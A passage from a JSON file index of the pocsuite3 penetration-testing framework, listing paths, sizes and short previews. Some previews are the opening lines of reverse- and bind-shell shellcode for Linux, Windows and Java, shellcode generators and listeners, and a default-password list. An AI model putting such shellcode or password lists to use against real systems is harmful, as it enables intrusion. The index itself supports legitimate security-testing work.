"path": "docs/USAGE.md",
"chars": 9088,
"preview": "# This document has stopped maintenance, please move to https://pocsuite.org\n\n# Usage\n\n- **pocsuite**: a cool and hackab"
},
{
"path": "make.bat",
"chars": 33,
"preview": "cd %~dp0\npython3 -m pip install ."
},
{
"path": "makefile",
"chars": 879,
"preview": "SRC_DIR = pocsuite3\nMAKE = make\n\n\n.PHONY: prebuildclean install build pypimeta pypi buildupload test flake8 clean\n\n\npreb"
},
{
"path": "manpages/poc-console.1",
"chars": 1658,
"preview": ".TH POC-CONSOLE \"1\" \"Nov 2022\" \"Manual page for poc-console\"\n.\\\"\n.\\\" Nov 3, 2022\n.\\\" Man page author:\n.\\\" 13ph03nix <a"
},
{
"path": "manpages/pocsuite.1",
"chars": 7100,
"preview": ".TH POCSUITE \"1\" \"Nov 2022\" \"Manual page for pocsuite\"\n.\\\"\n.\\\" Nov 3, 2022\n.\\\" Man page author:\n.\\\" 13ph03nix <abcnsxy"
},
{
"path": "pocsuite3/__init__.py",
"chars": 348,
"preview": "__title__ = 'pocsuite3'\n__version__ = '2.1.0'\n__author__ = 'Knownsec 404 Team'\n__author_email__ = '404-team@knownsec.com"
},
{
"path": "pocsuite3/api/__init__.py",
"chars": 2770,
"preview": "import base64\nimport binascii\nimport collections\nimport json\nimport os\nimport re\nimport socket\nimport ssl\nimport struct\n"
},
{
"path": "pocsuite3/cli.py",
"chars": 2156,
"preview": "import os\nimport sys\nimport threading\nimport time\nimport traceback\n\ntry:\n import pocsuite3\nexcept ImportError:\n sy"
},
{
"path": "pocsuite3/console.py",
"chars": 669,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Time : 2018/12/25 morning 10:49\n# @Author : chenghs\n# @File : c"
},
{
"path": "pocsuite3/data/password-top100.txt",
"chars": 700,
"preview": "admin\nadmin12\nadmin888\nadmin8\nadmin123\nsysadmin\nadminxxx\nadminx\n6kadmin\nbase\nfeitium\nadmins\nroot\nroots\ntest\ntest1\ntest12"
},
{
"path": "pocsuite3/lib/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "pocsuite3/lib/controller/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "pocsuite3/lib/controller/controller.py",
"chars": 8678,
"preview": "import copy\nimport time\n\nimport requests\nfrom prettytable import PrettyTable\nfrom pocsuite3.lib.core.common import data_"
},
{
"path": "pocsuite3/lib/core/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "pocsuite3/lib/core/clear.py",
"chars": 302,
"preview": "import logging\n\n\ndef remove_extra_log_message():\n logger_names = [\n \"paramiko\",\n \"paramiko.transport\",\n"
},
{
"path": "pocsuite3/lib/core/common.py",
"chars": 31218,
"preview": "# pylint: disable=E1101\nimport base64\nimport hashlib\nimport inspect\nimport logging\nimport os\nimport re\nimport select\nimp"
},
{
"path": "pocsuite3/lib/core/convert.py",
"chars": 1286,
"preview": "import sys\n\nfrom pocsuite3.lib.core.settings import IS_WIN\nfrom pocsuite3.lib.core.settings import UNICODE_ENCODING\n\n\nde"
},
{
"path": "pocsuite3/lib/core/data.py",
"chars": 630,
"preview": "from pocsuite3.lib.core.datatype import AttribDict\nfrom pocsuite3.lib.core.log import LOGGER\n\n# logger\nlogger = LOGGER\n\n"
},
{
"path": "pocsuite3/lib/core/datatype.py",
"chars": 1165,
"preview": "from collections import OrderedDict\n\n\nclass AttribDict(OrderedDict):\n \"\"\"\n AttrDict extends OrderedDict to provide"
},
{
"path": "pocsuite3/lib/core/decorators.py",
"chars": 482,
"preview": "import hashlib\n\n\ndef cachedmethod(f, cache={}):\n \"\"\"\n Method with a cached content\n Reference: http://code.acti"
},
{
"path": "pocsuite3/lib/core/docker_env.py",
"chars": 1916,
"preview": "from io import BytesIO\nfrom docker import client\nfrom docker import errors\n\n\nfrom pocsuite3.lib.core.data import logger\n"
},
{
"path": "pocsuite3/lib/core/enums.py",
"chars": 5837,
"preview": "from pocsuite3.lib.core.datatype import AttribDict\n\n\nclass LOGGING_LEVELS:\n NOTSET = 0\n DEBUG = 10\n INFO = 20\n "
},
{
"path": "pocsuite3/lib/core/exception.py",
"chars": 1692,
"preview": "from http.client import HTTPException\n\n\nclass PocsuiteBaseException(Exception):\n pass\n\n\nclass PocsuiteUserQuitExcepti"
},
{
"path": "pocsuite3/lib/core/interpreter.py",
"chars": 22321,
"preview": "# pylint: disable=E0202\nimport os\nimport re\nimport chardet\nimport prettytable\nfrom termcolor import colored\n\nfrom pocsui"
},
{
"path": "pocsuite3/lib/core/interpreter_option.py",
"chars": 6489,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Time : 2018/12/26 下午2:53\n# @Author : chenghs\n# @File : interpre"
},
{
"path": "pocsuite3/lib/core/log.py",
"chars": 1526,
"preview": "import sys\nimport logging\nimport colorlog\nfrom pocsuite3.lib.core.enums import CUSTOM_LOGGING\n\nlogging.addLevelName(CUST"
},
{
"path": "pocsuite3/lib/core/option.py",
"chars": 30567,
"preview": "import copy\nimport glob\nimport logging\nimport os\nimport re\nimport socket\nimport importlib\nfrom queue import Queue\nfrom u"
},
{
"path": "pocsuite3/lib/core/optiondict.py",
"chars": 2245,
"preview": "# Family: {\"parameter name\": \"parameter datatype\"},\n# --OR--\n# Family: {\"parameter name\": (\"parameter datatype\", \"catego"
},
{
"path": "pocsuite3/lib/core/plugin.py",
"chars": 2504,
"preview": "import os\n\nfrom pocsuite3.lib.core.common import is_pocsuite3_poc, single_time_warn_message\nfrom pocsuite3.lib.core.data"
},
{
"path": "pocsuite3/lib/core/poc.py",
"chars": 19811,
"preview": "# pylint: disable=E1101\nimport time\nimport re\nimport traceback\nimport inspect\nfrom collections import OrderedDict\n\nfrom "
},
{
"path": "pocsuite3/lib/core/readlineng.py",
"chars": 1833,
"preview": "from pocsuite3.lib.core.data import logger\nfrom pocsuite3.lib.core.settings import IS_WIN\nfrom pocsuite3.lib.core.settin"
},
{
"path": "pocsuite3/lib/core/register.py",
"chars": 4926,
"preview": "import re\nfrom importlib import metadata\nimport importlib.machinery\nimport importlib.util\nfrom importlib.abc import Load"
},
{
"path": "pocsuite3/lib/core/revision.py",
"chars": 1724,
"preview": "import os\nimport re\nimport subprocess\n\n\ndef stdout_encode(data):\n \"\"\"\n Cross-linked function\n \"\"\"\n if isinst"
},
{
"path": "pocsuite3/lib/core/settings.py",
"chars": 7820,
"preview": "import sys\nimport time\nimport os\nfrom platform import system, machine\n\nfrom pocsuite3 import __version__\nfrom pocsuite3."
},
{
"path": "pocsuite3/lib/core/shell.py",
"chars": 4447,
"preview": "import atexit\nimport os\n\nfrom pocsuite3.lib.core import readlineng as readline\nfrom pocsuite3.lib.core.data import logge"
},
{
"path": "pocsuite3/lib/core/statistics_comparison.py",
"chars": 2392,
"preview": "from pocsuite3.lib.core.common import data_to_stdout\nfrom prettytable import PrettyTable\n\n\nclass StatisticsComparison(ob"
},
{
"path": "pocsuite3/lib/core/template.py",
"chars": 9187,
"preview": "import sys\nimport datetime\nfrom collections import OrderedDict\nfrom pocsuite3 import __version__\nfrom pocsuite3.lib.core"
},
{
"path": "pocsuite3/lib/core/threads.py",
"chars": 3175,
"preview": "import time\nimport threading\nimport traceback\n\nfrom pocsuite3.lib.core.data import conf\nfrom pocsuite3.lib.core.data imp"
},
{
"path": "pocsuite3/lib/core/update.py",
"chars": 2041,
"preview": "from pocsuite3.lib.core.data import logger, conf\nfrom xmlrpc.client import ServerProxy\nfrom packaging.version import par"
},
{
"path": "pocsuite3/lib/helper/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "pocsuite3/lib/helper/archieve/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "pocsuite3/lib/helper/archieve/jar.py",
"chars": 1399,
"preview": "import os\nfrom .zip import Zip\n\n\nclass Jar(Zip):\n def __init__(self, filename=''):\n Zip.__init__(self, filenam"
},
{
"path": "pocsuite3/lib/helper/archieve/memoryzip.py",
"chars": 654,
"preview": "#!usr/bin/env python\n# -*- coding:utf-8 -*-\n\"\"\"\n@author: longofo\n@file: memoryzip.py\n@time: 2020/03/18\n\"\"\"\nimport zipfil"
},
{
"path": "pocsuite3/lib/helper/archieve/war.py",
"chars": 3418,
"preview": "#!usr/bin/env python\n# -*- coding:utf-8 -*-\n\"\"\"\n@author: longofo\n@file: war.py\n@time: 2020/03/18\n\"\"\"\nimport os\n\nfrom poc"
},
{
"path": "pocsuite3/lib/helper/archieve/zip.py",
"chars": 1126,
"preview": "import zipfile\n\n\nclass Zip:\n def __init__(self, filename=''):\n self.name = filename\n self.files = set()"
},
{
"path": "pocsuite3/lib/helper/java/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "pocsuite3/lib/helper/java/serialization.py",
"chars": 32903,
"preview": "import struct\n\n\nclass Constants:\n STREAM_MAGIC = 0xaced\n STREAM_VERSION = 5\n TC_NULL = 0x70\n TC_REFERENCE = "
},
{
"path": "pocsuite3/lib/parse/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "pocsuite3/lib/parse/cmd.py",
"chars": 13358,
"preview": "import argparse\nimport os\nimport sys\n\nfrom pocsuite3.lib.core.common import data_to_stdout\nfrom pocsuite3.lib.core.setti"
},
{
"path": "pocsuite3/lib/parse/configfile.py",
"chars": 2217,
"preview": "import os\nfrom configparser import ConfigParser\n\nfrom pocsuite3.lib.core.data import logger, conf\nfrom pocsuite3.lib.cor"
},
{
"path": "pocsuite3/lib/parse/dockerfile.py",
"chars": 672,
"preview": "import re\nfrom pocsuite3.lib.core.data import conf\nfrom pocsuite3.lib.core.data import logger\nfrom pocsuite3.lib.core.co"
},
{
"path": "pocsuite3/lib/parse/rules.py",
"chars": 4343,
"preview": "import re\nfrom pocsuite3.lib.core.data import conf\nfrom pocsuite3.lib.core.data import logger\nfrom pocsuite3.lib.core.co"
},
{
"path": "pocsuite3/lib/parse/url.py",
"chars": 1512,
"preview": "from pocsuite3.lib.utils import urlparse\n\n\nclass URL:\n\n def __init__(self, schema: bytes, host: bytes, port, path: by"
},
{
"path": "pocsuite3/lib/request/__init__.py",
"chars": 80,
"preview": "import requests\nfrom pocsuite3.lib.request.patch import patch_all\n\n\npatch_all()\n"
},
{
"path": "pocsuite3/lib/request/patch/__init__.py",
"chars": 1293,
"preview": "import urllib3\n\nfrom pocsuite3.lib.core.exception import PocsuiteIncompleteRead\nfrom .remove_ssl_verify import remove_ss"
},
{
"path": "pocsuite3/lib/request/patch/add_httpraw.py",
"chars": 2497,
"preview": "import requests\nfrom requests.sessions import Session\nimport json\n\nfrom requests.structures import CaseInsensitiveDict\n\n"
},
{
"path": "pocsuite3/lib/request/patch/hook_request.py",
"chars": 3204,
"preview": "from pocsuite3.lib.core.data import conf\nfrom pocsuite3.lib.core.enums import HTTP_HEADER\nfrom pocsuite3.lib.utils impor"
},
{
"path": "pocsuite3/lib/request/patch/hook_request_redirect.py",
"chars": 996,
"preview": "import requests\nfrom requests._internal_utils import to_native_string\nfrom requests.compat import is_py3\n\n\ndef get_redir"
},
{
"path": "pocsuite3/lib/request/patch/hook_urllib3_parse_url.py",
"chars": 7035,
"preview": "from __future__ import absolute_import\nfrom collections import namedtuple\nimport urllib3\n\n\nclass HTTPError(Exception):\n "
},
{
"path": "pocsuite3/lib/request/patch/remove_ssl_verify.py",
"chars": 151,
"preview": "import ssl\n\n\ndef remove_ssl_verify():\n # It doesn't seem to work. 09/07/2022\n ssl._create_default_https_context = "
},
{
"path": "pocsuite3/lib/request/patch/remove_warnings.py",
"chars": 58,
"preview": "from urllib3 import disable_warnings\n\n\ndisable_warnings()\n"
},
{
"path": "pocsuite3/lib/request/patch/session_reuse.py",
"chars": 481,
"preview": "from pocsuite3.lib.core.data import kb\n\n\nclass ReuseSession:\n def __init__(self):\n self.session_queue = kb.ses"
},
{
"path": "pocsuite3/lib/request/patch/unquote_request_uri.py",
"chars": 2164,
"preview": "import requests\nimport urllib3\nfrom requests.exceptions import InvalidURL\nfrom urllib.parse import quote\n\n\n# The unreser"
},
{
"path": "pocsuite3/lib/utils/__init__.py",
"chars": 13876,
"preview": "import re\nimport ast\nimport base64\nimport binascii\nimport os\nimport string\nimport random\nfrom faker import Faker\nfrom so"
},
{
"path": "pocsuite3/lib/utils/markup.py",
"chars": 20668,
"preview": "# This code is in the public domain, it comes\n# with absolutely no warranty and you can do\n# absolutely whatever you wan"
},
{
"path": "pocsuite3/lib/utils/pcap_sniffer.py",
"chars": 2095,
"preview": "import os\nfrom threading import Thread, Event\nfrom pocsuite3.lib.core.common import data_to_stdout, mosaic\nfrom pocsuite"
},
{
"path": "pocsuite3/lib/yaml/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "pocsuite3/lib/yaml/nuclei/__init__.py",
"chars": 8160,
"preview": "import binascii\nimport json\nimport re\nimport socket\nfrom collections import OrderedDict\n\nimport dacite\nimport yaml\nfrom "
},
{
"path": "pocsuite3/lib/yaml/nuclei/model/__init__.py",
"chars": 1269,
"preview": "from dataclasses import dataclass, field\nfrom enum import Enum\nfrom typing import NewType, Union\n\nStrSlice = NewType('St"
},
{
"path": "pocsuite3/lib/yaml/nuclei/operators/__init__.py",
"chars": 1416,
"preview": "from pocsuite3.lib.yaml.nuclei.operators.extrators import (Extractor,\n "
},
{
"path": "pocsuite3/lib/yaml/nuclei/operators/extrators/__init__.py",
"chars": 6686,
"preview": "import json\nimport re\nfrom dataclasses import dataclass, field\nfrom typing import List\n\nfrom lxml import etree\nfrom requ"
},
{
"path": "pocsuite3/lib/yaml/nuclei/operators/matchers/__init__.py",
"chars": 7262,
"preview": "import binascii\nimport re\nfrom dataclasses import dataclass, field\nfrom lxml import html\nfrom typing import List\n\nfrom p"
},
{
"path": "pocsuite3/lib/yaml/nuclei/protocols/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "pocsuite3/lib/yaml/nuclei/protocols/common/expressions/__init__.py",
"chars": 26468,
"preview": "import base64 as py_built_in_base64\nimport binascii\nimport datetime\nimport gzip as py_built_in_gzip\nimport hashlib\nimpor"
},
{
"path": "pocsuite3/lib/yaml/nuclei/protocols/common/expressions/safe_eval.py",
"chars": 6110,
"preview": "import re\nfrom ast import (\n Module,\n parse,\n walk,\n)\n\nfrom pocsuite3.lib.core.log import LOGGER as logger\n\nAST"
},
{
"path": "pocsuite3/lib/yaml/nuclei/protocols/common/generators/__init__.py",
"chars": 1053,
"preview": "import itertools\nfrom collections import OrderedDict\n\nfrom pocsuite3.lib.core.common import check_file, get_file_items\nf"
},
{
"path": "pocsuite3/lib/yaml/nuclei/protocols/common/interactsh/__init__.py",
"chars": 749,
"preview": "from dataclasses import dataclass, field\n\nfrom pocsuite3.lib.core.log import LOGGER as logger\nfrom pocsuite3.modules.int"
},
{
"path": "pocsuite3/lib/yaml/nuclei/protocols/common/replacer/__init__.py",
"chars": 737,
"preview": "import json\n\nfrom pocsuite3.lib.yaml.nuclei.protocols.common.expressions import evaluate, UNRESOLVED_VARIABLE, Marker\n\n\n"
},
{
"path": "pocsuite3/lib/yaml/nuclei/protocols/http/__init__.py",
"chars": 15916,
"preview": "from collections import OrderedDict\nfrom dataclasses import dataclass, field\nimport time\nfrom typing import Union, List,"
},
{
"path": "pocsuite3/lib/yaml/nuclei/protocols/network/__init__.py",
"chars": 9901,
"preview": "import binascii\nimport json\nimport socket\nimport ssl\nimport time\nfrom collections import OrderedDict\nfrom dataclasses im"
},
{
"path": "pocsuite3/lib/yaml/nuclei/templates/__init__.py",
"chars": 1026,
"preview": "from dataclasses import dataclass, field\nfrom typing import List\n\nfrom pocsuite3.lib.yaml.nuclei.model import Info, Case"
},
{
"path": "pocsuite3/modules/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "pocsuite3/modules/censys/__init__.py",
"chars": 4026,
"preview": "import time\nimport getpass\nfrom configparser import ConfigParser\nfrom pocsuite3.lib.core.data import paths, logger\nfrom "
},
{
"path": "pocsuite3/modules/ceye/__init__.py",
"chars": 5918,
"preview": "import getpass\nimport json\nimport os\nimport time\nimport re\nfrom configparser import ConfigParser\n\nfrom pocsuite3.api imp"
},
{
"path": "pocsuite3/modules/fofa/__init__.py",
"chars": 4025,
"preview": "import getpass\nimport time\nfrom base64 import b64encode\nfrom configparser import ConfigParser\nfrom pocsuite3.lib.core.da"
},
{
"path": "pocsuite3/modules/httpserver/__init__.py",
"chars": 7099,
"preview": "#!usr/bin/env python\n# -*- coding:utf-8 -*-\n\"\"\"\n@author: longofo\n@file: __init__.py\n@time: 2019/03/23\n\"\"\"\nimport os\nimpo"
},
{
"path": "pocsuite3/modules/hunter/__init__.py",
"chars": 3087,
"preview": "import getpass\nimport time\nimport base64\nfrom configparser import ConfigParser\nfrom pocsuite3.lib.core.data import logge"
},
{
"path": "pocsuite3/modules/interactsh/__init__.py",
"chars": 4646,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport base64\nimport json\nimport random\nimport time\nfrom base64 import b"
},
{
"path": "pocsuite3/modules/listener/__init__.py",
"chars": 397,
"preview": "from .reverse_tcp import handle_listener_connection\nfrom .reverse_tcp import start_listener\nfrom .reverse_tcp import REV"
},
{
"path": "pocsuite3/modules/listener/bind_tcp.py",
"chars": 7534,
"preview": "import os\nimport socket\nimport zlib\nimport pickle\nimport base64\nimport select\nimport threading\nfrom pocsuite3.lib.core.p"
},
{
"path": "pocsuite3/modules/listener/reverse_tcp.py",
"chars": 13807,
"preview": "import base64\nimport pickle\nimport zlib\nimport select\nimport socket\nimport threading\nimport time\nimport os\nfrom pocsuite"
},
{
"path": "pocsuite3/modules/quake/__init__.py",
"chars": 3230,
"preview": "import time\nimport getpass\nfrom configparser import ConfigParser\nfrom pocsuite3.lib.core.data import logger, paths\nfrom "
},
{
"path": "pocsuite3/modules/seebug/__init__.py",
"chars": 3466,
"preview": "import getpass\nfrom configparser import ConfigParser\n\nfrom pocsuite3.lib.request import requests\nfrom pocsuite3.lib.core"
},
{
"path": "pocsuite3/modules/shodan/__init__.py",
"chars": 3216,
"preview": "import time\nimport urllib\nimport getpass\nfrom configparser import ConfigParser\nfrom pocsuite3.lib.core.data import logge"
},
{
"path": "pocsuite3/modules/spider/__init__.py",
"chars": 4013,
"preview": "import re\nfrom urllib.parse import urljoin\nfrom html.parser import HTMLParser\nfrom pocsuite3.lib.request import requests"
},
{
"path": "pocsuite3/modules/zoomeye/__init__.py",
"chars": 5017,
"preview": "import getpass\nimport time\nfrom base64 import b64encode\nfrom configparser import ConfigParser\nfrom pocsuite3.lib.core.da"
},
{
"path": "pocsuite3/plugins/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "pocsuite3/plugins/file_record.py",
"chars": 1435,
"preview": "import os\nimport time\nimport json\nfrom pocsuite3.api import PLUGIN_TYPE\nfrom pocsuite3.api import PluginBase\nfrom pocsui"
},
{
"path": "pocsuite3/plugins/html_report.py",
"chars": 9871,
"preview": "import time\nimport sys\nimport os\nfrom pocsuite3 import __version__\nfrom pocsuite3.api import PluginBase\nfrom pocsuite3.a"
},
{
"path": "pocsuite3/plugins/poc_from_pocs.py",
"chars": 908,
"preview": "# load poc from pocs directories\nimport os\n\nfrom pocsuite3.api import PLUGIN_TYPE\nfrom pocsuite3.api import PluginBase\nf"
},
{
"path": "pocsuite3/plugins/poc_from_redis.py",
"chars": 1507,
"preview": "from pocsuite3.api import PluginBase\nfrom pocsuite3.api import PLUGIN_TYPE\nfrom pocsuite3.api import logger\nfrom pocsuit"
},
{
"path": "pocsuite3/plugins/poc_from_seebug.py",
"chars": 1969,
"preview": "from pocsuite3.api import PluginBase\nfrom pocsuite3.api import PLUGIN_TYPE\nfrom pocsuite3.api import logger\nfrom pocsuit"
},
{
"path": "pocsuite3/plugins/target_from_censys.py",
"chars": 1862,
"preview": "from pocsuite3.api import PluginBase\nfrom pocsuite3.api import PLUGIN_TYPE\nfrom pocsuite3.api import logger\nfrom pocsuit"
},
{
"path": "pocsuite3/plugins/target_from_cidr.py",
"chars": 1319,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Time : 2019/1/15 2:32 PM\n# @Author : chenghs\n# @File : target_f"
},
{
"path": "pocsuite3/plugins/target_from_fofa.py",
"chars": 1565,
"preview": "from pocsuite3.api import PluginBase\nfrom pocsuite3.api import PLUGIN_TYPE\nfrom pocsuite3.api import logger\nfrom pocsuit"
},
{
"path": "pocsuite3/plugins/target_from_hunter.py",
"chars": 1662,
"preview": "from pocsuite3.api import PluginBase\nfrom pocsuite3.api import PLUGIN_TYPE\nfrom pocsuite3.api import logger\nfrom pocsuit"
},
{
"path": "pocsuite3/plugins/target_from_quake.py",
"chars": 1546,
"preview": "from pocsuite3.api import PluginBase\nfrom pocsuite3.api import PLUGIN_TYPE\nfrom pocsuite3.api import logger\nfrom pocsuit"
},
{
"path": "pocsuite3/plugins/target_from_redis.py",
"chars": 1508,
"preview": "from pocsuite3.api import PluginBase\nfrom pocsuite3.api import PLUGIN_TYPE\nfrom pocsuite3.api import logger\nfrom pocsuit"
},
{
"path": "pocsuite3/plugins/target_from_shodan.py",
"chars": 1662,
"preview": "from pocsuite3.api import PluginBase\nfrom pocsuite3.api import PLUGIN_TYPE\nfrom pocsuite3.api import logger\nfrom pocsuit"
},
{
"path": "pocsuite3/plugins/target_from_zoomeye.py",
"chars": 1487,
"preview": "from pocsuite3.api import PluginBase\nfrom pocsuite3.api import PLUGIN_TYPE\nfrom pocsuite3.api import logger\nfrom pocsuit"
},
{
"path": "pocsuite3/plugins/web_hook.py",
"chars": 2334,
"preview": "import hmac\nimport hashlib\nimport base64\nimport urllib.parse\nimport requests\nimport time\n\nfrom pocsuite3.api import PLUG"
},
{
"path": "pocsuite3/shellcodes/__init__.py",
"chars": 7292,
"preview": "import os\nfrom platform import system, architecture\n\nfrom pocsuite3.lib.core.data import logger\nfrom pocsuite3.lib.core."
},
{
"path": "pocsuite3/shellcodes/base.py",
"chars": 976,
"preview": "\n\nclass ShellCode:\n def __init__(self, os_target='', os_target_arch='', connect_back_ip='localhost', connect_back_por"
},
{
"path": "pocsuite3/shellcodes/data/java/src/ReverseTCP/Payload.java",
"chars": 2279,
"preview": "package east;\n\nimport java.io.*;\nimport java.net.*;\n\npublic class Payload extends ClassLoader{\n\tprivate static String OS"
},
{
"path": "pocsuite3/shellcodes/data/linux/src/bind_tcp.asm",
"chars": 655,
"preview": "global _start\n\nsection .text\n_start:\n\tpush 0x66\n\tpop eax\n\tpush 0x1\n\tpop ebx\n\txor esi, esi\n\tpush esi\n\tpush ebx\n\tpush 0x2\n"
},
{
"path": "pocsuite3/shellcodes/data/linux/src/reverse_tcp.asm",
"chars": 5282,
"preview": "BITS 32\n\nglobal _start\n\n_start:\n ; =============================== SOCKET =====================================\n "
},
{
"path": "pocsuite3/shellcodes/data/linux/x64/src/bind_tcp.asm",
"chars": 689,
"preview": "BITS 64\nglobal _start\nsection .text\n\n_start:\n push 0x29\n pop rax\n cdq\n push 0x2\n pop rdi\n pu"
},
{
"path": "pocsuite3/shellcodes/data/linux/x64/src/reverse_tcp.asm",
"chars": 2243,
"preview": "BITS 64\nglobal _start\n\n; settings\n;IP equ 0x0100007f ; default 127.0.0.1, contains nulls so will need mask\nIP "
},
{
"path": "pocsuite3/shellcodes/data/windows/src/bind_tcp.asm",
"chars": 2465,
"preview": "BITS 32\n cld\n call start\napi_call:\n pushad\n mov ebp, esp\n xor edx, edx\n mov edx, [fs:edx+48]\n mov edx, [edx+12]\n "
},
{
"path": "pocsuite3/shellcodes/data/windows/src/reverse_tcp.asm",
"chars": 2173,
"preview": "global _start\n_start:\n\tcld\n\tcall main\n\tpusha\n\tmov ebp,esp\n\txor eax,eax\n\tmov edx,DWORD [fs:eax+0x30]\n\tmov edx,DWORD [ed"
},
{
"path": "pocsuite3/shellcodes/data/windows/x64/src/bind_tcp.asm",
"chars": 2797,
"preview": "[BITS 64]\n cld\n and rsp, 0xFFFFFFFFFFFFFFF0\n call start\napi_call:\n push r9\n push r8\n push rdx\n push rcx\n push rs"
},
{
"path": "pocsuite3/shellcodes/data/windows/x64/src/reverse_tcp.asm",
"chars": 2608,
"preview": "[BITS 64]\n cld\n and rsp, 0xFFFFFFFFFFFFFFF0\n call start\napi_call:\n push r9\n push r8\n push rdx\n push rcx\n push rs"
},
{
"path": "pocsuite3/shellcodes/dotnet.py",
"chars": 3568,
"preview": "from .base import ShellCode\n\n\nclass AspxShellCode(ShellCode):\n \"\"\"\n Class with shellcode for .NET language\n "
},
{
"path": "pocsuite3/shellcodes/encoder.py",
"chars": 21064,
"preview": "from random import randint\nimport types\n\nfrom pocsuite3.lib.core.common import create_shellcode\nfrom pocsuite3.lib.core."
},
{
"path": "pocsuite3/shellcodes/generator.py",
"chars": 17379,
"preview": "import struct\nimport time\nimport os\nfrom pocsuite3.lib.core.data import paths, logger\nfrom pocsuite3.lib.core.enums impo"
},
{
"path": "pocsuite3/shellcodes/java.py",
"chars": 19194,
"preview": "import os\nfrom .base import ShellCode\nfrom pocsuite3.lib.core.data import paths\nfrom pocsuite3.lib.helper.archieve.jar i"
},
{
"path": "pocsuite3/shellcodes/php.py",
"chars": 2235,
"preview": "from .base import ShellCode\n\n\nclass PhpShellCode(ShellCode):\n \"\"\"\n Class with shellcode for php language\n \""
},
{
"path": "pocsuite3/shellcodes/python.py",
"chars": 1871,
"preview": "import zlib\nimport base64\nfrom .base import ShellCode\n\n\nclass PythonShellCode(ShellCode):\n \"\"\"\n Class with she"
},
{
"path": "requirements.txt",
"chars": 332,
"preview": "requests >= 2.22.0\nPySocks >= 1.7.1\nrequests-toolbelt >= 0.9.1\nurllib3 >= 1.25.6\nchardet >= 3.0.4\ntermcolor >= 1.1.0\ncol"
},
{
"path": "setup.cfg",
"chars": 267,
"preview": "[metadata]\ndescription-file = README.md\n\n[bdist_wheel]\nuniversal = 1\n\n[flake8]\nper-file-ignores =\n # imported but unu"
},
{
"path": "setup.py",
"chars": 1867,
"preview": "#!/usr/bin/env python\nimport os\ntry:\n from setuptools import setup, find_packages\nexcept ImportError:\n from distut"
},
{
"path": "test.py",
"chars": 427,
"preview": "import os\nfrom unittest import TestLoader, TextTestRunner\n\n\nif __name__ == '__main__':\n loader = TestLoader()\n tes"
},
{
"path": "tests/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "tests/login_demo.py",
"chars": 1730,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Time : 2019/2/26 2:33 PM\n# @Author : chenghsm\n# @File : login_d"
},
{
"path": "tests/test_api_diy_options.py",
"chars": 1919,
"preview": "import os\nimport unittest\nfrom pocsuite3.api import init_pocsuite\nfrom pocsuite3.api import start_pocsuite\nfrom pocsuite"
},
{
"path": "tests/test_api_get_poc_info.py",
"chars": 2378,
"preview": "import os\nimport unittest\n\nfrom pocsuite3.api import init_pocsuite\nfrom pocsuite3.api import load_file_to_module, paths,"
},
{
"path": "tests/test_build_url.py",
"chars": 17688,
"preview": "import os\nimport tempfile\nimport textwrap\nimport unittest\n\nfrom pocsuite3.api import get_results, init_pocsuite, start_p"
},
{
"path": "tests/test_check_install_requires.py",
"chars": 1483,
"preview": "import unittest\nfrom pocsuite3.lib.core.register import PocLoader\n\n\nclass TestCase(unittest.TestCase):\n def setUp(sel"
},
{
"path": "tests/test_cmd_diy_options.py",
"chars": 1023,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Time : 2019/2/26 4:34 PM\n# @Author : chenghs\n# @File : test_cmd"
},
{
"path": "tests/test_configfile.py",
"chars": 12893,
"preview": "import os\nimport unittest\nfrom configparser import ConfigParser\nfrom optparse import OptionParser, OptionGroup\n\nfrom poc"
},
{
"path": "tests/test_generate_shellcode_list.py",
"chars": 607,
"preview": "import unittest\n\nfrom pocsuite3.lib.core.enums import OS, OS_ARCH\nfrom pocsuite3.lib.utils import generate_shellcode_lis"
},
{
"path": "tests/test_httpserver.py",
"chars": 3752,
"preview": "#!usr/bin/env python\n# -*- coding:utf-8 -*-\n\"\"\"\n@author: longofo\n@file: test_httpserver.py\n@time: 2019/03/31\n\"\"\"\nimport "
},
{
"path": "tests/test_import_pocsuite_execute.py",
"chars": 612,
"preview": "import unittest\nfrom pocsuite3.api import init_pocsuite\nfrom pocsuite3.api import start_pocsuite\nfrom pocsuite3.api impo"
},
{
"path": "tests/test_interactsh_module.py",
"chars": 554,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport unittest\nfrom pocsuite3.api import Interactsh, requests\n\n\nclass T"
},
{
"path": "tests/test_nuclei_helper_functions.py",
"chars": 6206,
"preview": "import unittest\nfrom pocsuite3.lib.yaml.nuclei.protocols.common.expressions import *\n\n\nclass TestCase(unittest.TestCase)"
},
{
"path": "tests/test_osshell.py",
"chars": 3220,
"preview": "import unittest\nimport os\nfrom pocsuite3.api import OSShellcodes\nfrom pocsuite3.lib.core.data import paths\nfrom pocsuite"
},
{
"path": "tests/test_parse_target.py",
"chars": 4250,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport unittest\nfrom pocsuite3.lib.core.common import parse_target\nfrom "
},
{
"path": "tests/test_request_raw.py",
"chars": 2255,
"preview": "import unittest\nfrom pocsuite3.api import requests, init_pocsuite\n\n\nclass TestCase(unittest.TestCase):\n def setUp(sel"
},
{
"path": "tests/test_show_poc_options.py",
"chars": 481,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport os\nimport unittest\n\n\nclass TestCase(unittest.TestCase):\n def se"
},
{
"path": "tests/test_spier_crawl.py",
"chars": 556,
"preview": "import unittest\nfrom pocsuite3.api import crawl\n\n\nclass TestCase(unittest.TestCase):\n def setUp(self):\n self.u"
},
{
